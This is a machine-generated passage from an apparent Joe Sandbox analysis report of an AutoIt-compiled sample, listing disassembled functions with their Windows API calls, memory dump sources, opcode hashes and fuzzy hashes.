                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID: _wcslen
                                  • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                  • API String ID: 176396367-2734436370
                                  • Opcode ID: c9db0983e6fc0c39739c3072b92f6ee7a94b820122bc93718852f8824d97ed2f
                                  • Instruction ID: 3adb1cdf87fc60c32fe8830b97079a6079fec6a235e01377448768dfc8f19748
                                  • Opcode Fuzzy Hash: c9db0983e6fc0c39739c3072b92f6ee7a94b820122bc93718852f8824d97ed2f
                                  • Instruction Fuzzy Hash: 8E215B3214452566C333AB25DC02FFB73DC9F52318F118027FB499B881EB95AD45C295
                                  Function 003E37B7 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON
                                  Download Yara Rule
                                  APIs
                                  • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 003E3840
                                  • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 003E3850
                                  • MoveWindow.USER32(00000000,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 003E3876
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID: MessageSend$MoveWindow
                                  • String ID: Listbox
                                  • API String ID: 3315199576-2633736733
                                  • Opcode ID: c623940afe500933be5258f08430f46e3c91a84d3a9b5964c432ee32d3a39c8b
                                  • Instruction ID: 80b335ea9d413c371a4bcef439f8f0d014ba640db73ec2b000376e4f410ff6bd
                                  • Opcode Fuzzy Hash: c623940afe500933be5258f08430f46e3c91a84d3a9b5964c432ee32d3a39c8b
                                  • Instruction Fuzzy Hash: 56218072610268BBEF229F56CC85FAB376EEF89750F118224F9049B1D0C671DC5287A0
                                  Function 003C49F4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 78COMMON
                                  Download Yara Rule
                                  APIs
                                  • SetErrorMode.KERNEL32(00000001), ref: 003C4A08
                                  • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 003C4A5C
                                  • SetErrorMode.KERNEL32(00000000,?,?,003ECC08), ref: 003C4AD0
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID: ErrorMode$InformationVolume
                                  • String ID: %lu
                                  • API String ID: 2507767853-685833217
                                  • Opcode ID: eced35d8d2f261b5dcf2b44e81adc1b8568d903defefaa48c33fd36215ba401f
                                  • Instruction ID: 71afb784db0af5908f4629a2ad29a2e72d240fd5f7fbc79d968bd3c9c0769aa8
                                  • Opcode Fuzzy Hash: eced35d8d2f261b5dcf2b44e81adc1b8568d903defefaa48c33fd36215ba401f
                                  • Instruction Fuzzy Hash: 3C312F75A00109AFDB11DF54C885EAA77F8EF05308F158099E905DF262D771ED46CB61
                                  Function 003E41EB Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67windowCOMMON
                                  Download Yara Rule
                                  APIs
                                  • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 003E424F
                                  • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 003E4264
                                  • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 003E4271
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID: MessageSend
                                  • String ID: msctls_trackbar32
                                  • API String ID: 3850602802-1010561917
                                  • Opcode ID: 93cfd0f4194c60454c5fb18545ac8e70b5cf626e474c7ed46c8511bca5e095a1
                                  • Instruction ID: f6beff4270bbc43de5dab99fd800e0e2fcd8849136b43bae80c1ce5b957ec701
                                  • Opcode Fuzzy Hash: 93cfd0f4194c60454c5fb18545ac8e70b5cf626e474c7ed46c8511bca5e095a1
                                  • Instruction Fuzzy Hash: 65110A312402887EEF215F25CC46FEB7BACEF99764F110624FA55E60E0D271DC519710
                                  Function 003B2F52 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67windowCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00356B57: _wcslen.LIBCMT ref: 00356B6A
                                    • Part of subcall function 003B2DA7: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 003B2DC5
                                    • Part of subcall function 003B2DA7: GetWindowThreadProcessId.USER32(?,00000000), ref: 003B2DD6
                                    • Part of subcall function 003B2DA7: GetCurrentThreadId.KERNEL32 ref: 003B2DDD
                                    • Part of subcall function 003B2DA7: AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 003B2DE4
                                  • GetFocus.USER32 ref: 003B2F78
                                    • Part of subcall function 003B2DEE: GetParent.USER32(00000000), ref: 003B2DF9
                                  • GetClassNameW.USER32(?,?,00000100), ref: 003B2FC3
                                  • EnumChildWindows.USER32(?,003B303B), ref: 003B2FEB
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows_wcslen
                                  • String ID: %s%d
                                  • API String ID: 1272988791-1110647743
                                  • Opcode ID: 811fbca24fae49aaf14cd29f8b49d747aaf962db4eff3b2dfbc769120e0453da
                                  • Instruction ID: eb56f43fbb1b5811da323af5df8f770a150b66fdcd57f6b39398da54109e2c7e
                                  • Opcode Fuzzy Hash: 811fbca24fae49aaf14cd29f8b49d747aaf962db4eff3b2dfbc769120e0453da
                                  • Instruction Fuzzy Hash: 3111E4716002156BCF127F74CCD6EEE376AAF94308F044079FE199F192DE309A4A8B60
                                  Function 003E5882 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47windowCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetMenuItemInfoW.USER32(?,?,?,00000030), ref: 003E58C1
                                  • SetMenuItemInfoW.USER32(?,?,?,00000030), ref: 003E58EE
                                  • DrawMenuBar.USER32(?), ref: 003E58FD
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID: Menu$InfoItem$Draw
                                  • String ID: 0
                                  • API String ID: 3227129158-4108050209
                                  • Opcode ID: fa0fb66539adc46deaddfa277621bfd95135a701b933f44a442b5c76081d245f
                                  • Instruction ID: 3535a8c92d971462fcd6982d4c270eeb8583e8b407066a547e984957400b867e
                                  • Opcode Fuzzy Hash: fa0fb66539adc46deaddfa277621bfd95135a701b933f44a442b5c76081d245f
                                  • Instruction Fuzzy Hash: 03016131500258EFDB229F12DC44BEEBFB8FB45365F108199F949DA191DB308A94DF21
                                  Function 003AD3A0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 29libraryloaderCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetProcAddress.KERNEL32(?,GetSystemWow64DirectoryW), ref: 003AD3BF
                                  • FreeLibrary.KERNEL32 ref: 003AD3E5
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID: AddressFreeLibraryProc
                                  • String ID: GetSystemWow64DirectoryW$X64
                                  • API String ID: 3013587201-2590602151
                                  • Opcode ID: 017a4269441b9648014f46272f540233f4e083a33a37d68657c4d057e7a52171
                                  • Instruction ID: d291a334a4202943fefb150f9927923b94f40b3c64a5c4720a8353406ba8ae7b
                                  • Opcode Fuzzy Hash: 017a4269441b9648014f46272f540233f4e083a33a37d68657c4d057e7a52171
                                  • Instruction Fuzzy Hash: C8F0553AA01A219BDB3342108C58BAD7328FF13701F569A19E803E6D88D720CC44C692
                                  Function 003B007F Relevance: 6.3, APIs: 4, Instructions: 322COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: ab58402f93e88699309ebab4e8e308227e95a37afd06331779faf19356f32435
                                  • Instruction ID: cb571105c292df96965bb194cf87ca17fb0b53d9cd40c8e7b271c8c491667c43
                                  • Opcode Fuzzy Hash: ab58402f93e88699309ebab4e8e308227e95a37afd06331779faf19356f32435
                                  • Instruction Fuzzy Hash: D3C14D75A0020AEFDB19CFA8C898AAEB7B5FF48708F118598E605EF651D731DD41CB90
                                  Function 003D342E Relevance: 6.3, APIs: 4, Instructions: 257COMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID: Variant$ClearInitInitializeUninitialize
                                  • String ID:
                                  • API String ID: 1998397398-0
                                  • Opcode ID: 1b369152c44acb26d328af0bcd64e68405bf78ec42ac7ba7ec44f333297cadee
                                  • Instruction ID: 6ff93eee55b37f76852f4eb055afe74da5c5b6430db134fa19e4d0329923edd9
                                  • Opcode Fuzzy Hash: 1b369152c44acb26d328af0bcd64e68405bf78ec42ac7ba7ec44f333297cadee
                                  • Instruction Fuzzy Hash: 12A139762042009FC712DF28D485E2AB7E5FF89715F05885AF98A9F362DB30ED05CB92
                                  Function 003B0436 Relevance: 6.2, APIs: 4, Instructions: 230COMMON
                                  Download Yara Rule
                                  APIs
                                  • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,003EFC08,?), ref: 003B05F0
                                  • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,003EFC08,?), ref: 003B0608
                                  • CLSIDFromProgID.OLE32(?,?,00000000,003ECC40,000000FF,?,00000000,00000800,00000000,?,003EFC08,?), ref: 003B062D
                                  • _memcmp.LIBVCRUNTIME ref: 003B064E
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID: FromProg$FreeTask_memcmp
                                  • String ID:
                                  • API String ID: 314563124-0
                                  • Opcode ID: 5a874284e39122b2f499dd13cddd1e42a1a0014aa2983274cb8ead25c5f09c21
                                  • Instruction ID: 40d5ba343dd1eaecccfa34b69eefdccbcd0860066cfccca0140c1e5b2eee8017
                                  • Opcode Fuzzy Hash: 5a874284e39122b2f499dd13cddd1e42a1a0014aa2983274cb8ead25c5f09c21
                                  • Instruction Fuzzy Hash: C2813C71A00109EFCB05DF94C984EEEB7B9FF89315F204559E606AB250DB71AE06CF60
                                  Function 00391391 Relevance: 6.2, APIs: 4, Instructions: 152COMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID: _free
                                  • String ID:
                                  • API String ID: 269201875-0
                                  • Opcode ID: 63d13ef9e3f0a97e2f4938993f945bf470ddc90b493ce42fd4b2f8d23ce978ba
                                  • Instruction ID: 5c5ff2e0b9abaed1454e4f5cb45b61a3c2345b5f4279db45b4ecb54defecab0a
                                  • Opcode Fuzzy Hash: 63d13ef9e3f0a97e2f4938993f945bf470ddc90b493ce42fd4b2f8d23ce978ba
                                  • Instruction Fuzzy Hash: 61412C35600202AFDF337BFA8C456BE3AF8EF45370F264665F419FA192E67888415762
                                  Function 003E6278 Relevance: 6.1, APIs: 4, Instructions: 138COMMON
                                  Download Yara Rule
                                  APIs
                                  • GetWindowRect.USER32(0119E6B0,?), ref: 003E62E2
                                  • ScreenToClient.USER32(?,?), ref: 003E6315
                                  • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,?,?,?), ref: 003E6382
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID: Window$ClientMoveRectScreen
                                  • String ID:
                                  • API String ID: 3880355969-0
                                  • Opcode ID: abd26de25bb1b5dd82c79e8b284397bd71e72bcd274f478d59a032a3ba07f7a4
                                  • Instruction ID: 9ec27f360f18f8be6789b7c0be4a6216d778d4413ca0335c308558917714d231
                                  • Opcode Fuzzy Hash: abd26de25bb1b5dd82c79e8b284397bd71e72bcd274f478d59a032a3ba07f7a4
                                  • Instruction Fuzzy Hash: 86515D74A00255EFCF21CF55D881AAE7BB6FB653A0F118269F9159B2E0D730ED81CB50
                                  Function 003D1AD6 Relevance: 6.1, APIs: 4, Instructions: 138networkCOMMON
                                  Download Yara Rule
                                  APIs
                                  • socket.WSOCK32(00000002,00000002,00000011), ref: 003D1AFD
                                  • WSAGetLastError.WSOCK32 ref: 003D1B0B
                                  • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 003D1B8A
                                  • WSAGetLastError.WSOCK32 ref: 003D1B94
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID: ErrorLast$socket
                                  • String ID:
                                  • API String ID: 1881357543-0
                                  • Opcode ID: 1739765434c4ac7978aac15804bd1bd089e2c87931d5a68478b65acc107e46d9
                                  • Instruction ID: cc2f8312add7ba707177252f2949687184ca1bd89b24c2555a582066376bdb2d
                                  • Opcode Fuzzy Hash: 1739765434c4ac7978aac15804bd1bd089e2c87931d5a68478b65acc107e46d9
                                  • Instruction Fuzzy Hash: 0A41B035600200AFE722AF24D886F2A77E5AB44718F54C44DF91A9F3E2D772ED42CB90
                                  Function 0038B41F Relevance: 6.1, APIs: 4, Instructions: 133COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 9d78b32e8376fa41e6eb8d7442d47edef4cccd522f1e25a2ae2691de88b385d9
                                  • Instruction ID: 1b0f61b34457b40994098f74fe0bf2d9b8cea2922e930debfbed00a7c6445e53
                                  • Opcode Fuzzy Hash: 9d78b32e8376fa41e6eb8d7442d47edef4cccd522f1e25a2ae2691de88b385d9
                                  • Instruction Fuzzy Hash: 90412875A00305AFE726AF39CC42B6BBBA9EF84710F20856AF546DF692D37199018790
                                  Function 003C56D9 Relevance: 6.1, APIs: 4, Instructions: 110fileCOMMON
                                  Download Yara Rule
                                  APIs
                                  • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 003C5783
                                  • GetLastError.KERNEL32(?,00000000), ref: 003C57A9
                                  • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 003C57CE
                                  • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 003C57FA
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
